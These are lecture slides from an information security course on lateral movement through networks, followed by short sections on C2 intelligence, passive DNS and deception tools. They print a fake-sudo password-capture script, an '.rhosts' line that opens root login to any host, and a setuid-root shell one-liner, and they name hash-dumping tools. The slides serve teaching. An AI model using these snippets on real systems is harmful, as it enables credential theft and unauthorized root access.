Introduction to Information SecurityNetwork Travesal (Hacking Operations)

& Miscellaneous related subjects

1

Network Traversal - Introduction

• We now move from discussing the act of hacking a single machine or device, to discuss the act of traversing through an entire network:• How organized networks are structured.

• How hackers penetrate organized networks, usually administered by a single person, or team of administrators.

• How hackers traverse the network to gain access to more resources and data.

• Sometimes referred to as lateral movement.

Victim Network

Vertical

Horizontal/Lateral

First Target: Patient 0

• Hackers will try to infect one computer, by different methods:• Chance / statistical luck!

• Spear-phishing or human error.

• Social engineering

• Pure hacking.

• After infecting patient 0. Hackers can attempt to launch different types of attacks which can now depend on the internal network structure.

• By using information and access readily available on the hacked machine, hackers can attempt to laterally traverse the network.

Spearphishing

• “Spear phishing is an e-mail spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.” --http://searchsecurity.techtarget.com/definition/spear-phishing

An email I received

• True story: I received this email last year. Can you spot the fail?

Network-wide Users

• In an organized network , each user is given a single user/password credential, this password is used to authenticate the user against all machines in the network which the user should have access to.

• Example: TAU. Your user and password is used to login to the *n?xmachines as well as the video website.

• If a computer used by one of the users is compromised. you can use his credentials if gained to login to all machines in the network.

Sniffing for passwords

• By local example

• .bashrc << __EOF__

• alias ‘sudo’ ‘/tmp/sudo.sh’

• __EOF__

• /tmp/sudo.sh << __EOF__

• #!/bin/bash

• echo “Enter password:”

• read PASS

• echo $PASS > /tmp/.password.log

• sudo $1 $2 $3 $4 $5 $6

• __EOF__

Sniffing for passwords

• On windows and other GUI based applications: key logging is used to record credentials being entered.

• By actually sniffing the network, looking for “telnet” or other unencrypted communication ways – communication where passwords are given in clear text format.

• Sniffing the network traffic looking for hashes which can later be cracked (More in next slide).

Cracking passwords

• Gaining root access to /etc/shadow (previously /etc/passwd) leads to obtaining password hashes

• John the Ripper or other password brute forcing techniques can then be used to retrieve the clear text password.

• The clear text password can be used to login to other computers.

• Users tend to use the same password for all computers and services, making it easy to gain access to other resources.

rlogin/rsh - history

• Instead of logging in all the time – rlogin/rsh is used to authenticate a user without the need to enter a password.

• Once a connection is received from a trusted machine and it declares that the user remotely connecting is the user, the user automatically gains remote machine access with the same credentials.

• Many hacking techniques employ:• echo “+ +” > ~root/.rhosts

• This lets anybody from any host connect to the computer.

• IP spoofing can be used to gain remote access as well. And this poor authentication is still being used in some dark corners of the world.

• NFS V < 4 has also utilizes the same bad authentication by only comparing host/port(using identd) to identify the user.

Domain of computers

Unix NIS (Network Information Service)

• The NIS (formerly known as Yellow Pages/YP) protocol is and old protocol used to sync passwords across a network.

• The NIS passwords are used to spread credential of a network of computers.

• From each of the servers in the network access is given to a virtual directory which contains files such as “passwd”/ “shadow”, etc.

• By using shell: # ypcat passwd• You can get the network hashes of ALL users!

• In a secure network scheme this does not include the root account, however local account access can be gained on all computers sharing the passwd file.

Pass the hash

• Passing the hash is an original way of authentication for SSO (Single Sign On) which is easily exploitable.

• In windows based systems, by simply passing the hash, a user is able to proove that he has the credentials needed to gain access to a resource (such as a network share).

• Once hackers log in to a system, they can use locally existing network hashes to pass them to other systems by this process:• Gain local administrator privileges

• View locally logged in accounts.

• Impersonate a user locally.

• Use regular windows operations to access network resources.

• Gain more access and run remote code using psexec (sysinternals utility).

LSASS

• Slide was taking from “WCE Internals by Amplia Security”

Hash harvesting

• On windows computers, hashes are saved locally even after a logon session is terminated in case access to the domain is no longer available.

• Several tools are in the wild used to do this hash harvesting, such as:• WCE – Windows Credential Editor• Pass The Hash Toolkit.• gsecdump• Maybe more.• pwdump - hash dumping is also possible localy by dumping the SAM file (Security

Accounts Manager)

• WCE and its like:• User ProcessReadMemory() to read the memory of LSASS for harvesting• Inject code to implement the impersonation of users.

• Side Note – cracking NTLM hashes:• NTLM aka NT LanMan (Lan Manager) hashes are DES based hashes of max 14 byte

passwords: Each 7 bytes of the password is hashed seperately making it easier instead of 256^14 we get 256^7 * 2. Therefore a rainbow table can be easily created.

Unix NFS (Network File System)

• The Unix NFS comparable to windows “Sharing”. Is a method of sharing directories by allowing other to locally mount a remote directory as if it was their own.

• As we previously learned using u+s and o+x to a file that hands us root privileges we are able to escalate our privileges:• echo "main(){setuid(0);setgid(0);system("/bin/sh");}" > a.c

• gcc –o a a.c

• Misconfigured NFS, allows mounted directory to contain suid files, therefore allowing root on one machine the ability to gain

• http://packetstorm.wowhacker.com/mag/faith/faith8.txt

Shared binaries patching

• Administrators or users share binaries on network shares / NFS. (Usually installation files).

• If those network shares are writable by a hacker he can modify them and then wait for other users to execute them.

• Example at TAU:user@nova:~$ mount | grep '/ type'netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs(rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)

Some miscellaneous related topics

• 0-day gap

• C2 Intelligence

• Passive DNS

• Deception Tactics

0-day gap

• TTM (time-to-market) between vulnerability discovery to patch is called 0-day response time.

• Companies have public contact info for disclosing exploits by researchers.

• If an exploit is disclosed there is a race between hackers and developers to exploit vs to close.

• Companies hire vulnerability researchers to look for bugs that could compromise their security.

0-Day Example

C2 (C&C) Intelligence

• Anti-viruses classic model, was signature based.• Signatures inside binaries.• Signatures in the windows registry keys & values.• Signatures in network traffic.

• Network anti-viruses use the same engines but from the network

• Old attitude:• Only detect what you can _remove_.

• New attitude:• Just detection and blocking is better than nothing.

• Signatures were rephrased as intelligence with emphasis on detection - another common name is Indicator of Compromise or IOC

• Some intelligence vendors take active measures to discover intelligence.

Caveats of Intelligence

• Without ‘hacking’ hackers there is no way to create an IOC before someone was attacked.

• If hackers create different C2 servers for each attack you’ll never have the intelligence on time.

Passive DNS

Security researchers have been collecting IP-Host pairs for a few years now.This is done using data collectors installed at many ISP DNSs.

Passive DNS (Cont.)

• The Host-IP pairs can be used to back-track hackers’ resources.

• If hacker An0n2016 uses cnn-news.com (its blacklisted).

• Using the database we can see:

• Now without much more information, you would educated guess that adobe-updatre.org is being used by the same hacker, therefore we can blacklist it to.

• Virustotal.com has a publicly query-able passive database but it is an incomplete one.

Other Techniques for Realtime C2 Intelligence

• Newly created domains• Domain that is seen for the first time.

• Whois/Whowas & NLP• The internet domain registry contains data on the owner

• Look for:• Private registration

• Domain popularity

• Geolocation• Maybe your network shouldn’t be connecting to China.

Deception Solutions

• A new breed of product aimed at exposing attackers by deceiving them to working on.

Credit: https://www.cymmetria.com/

Questions?

Good Luck in the Test!

• The test is hard.

• You will need to prepare a folder with this semesters material and bookmarks for subjects!

• Hopefully, there will be a 3 hour rehearsal exercise before the test.

• Feel free to drop by us questions and ask for help.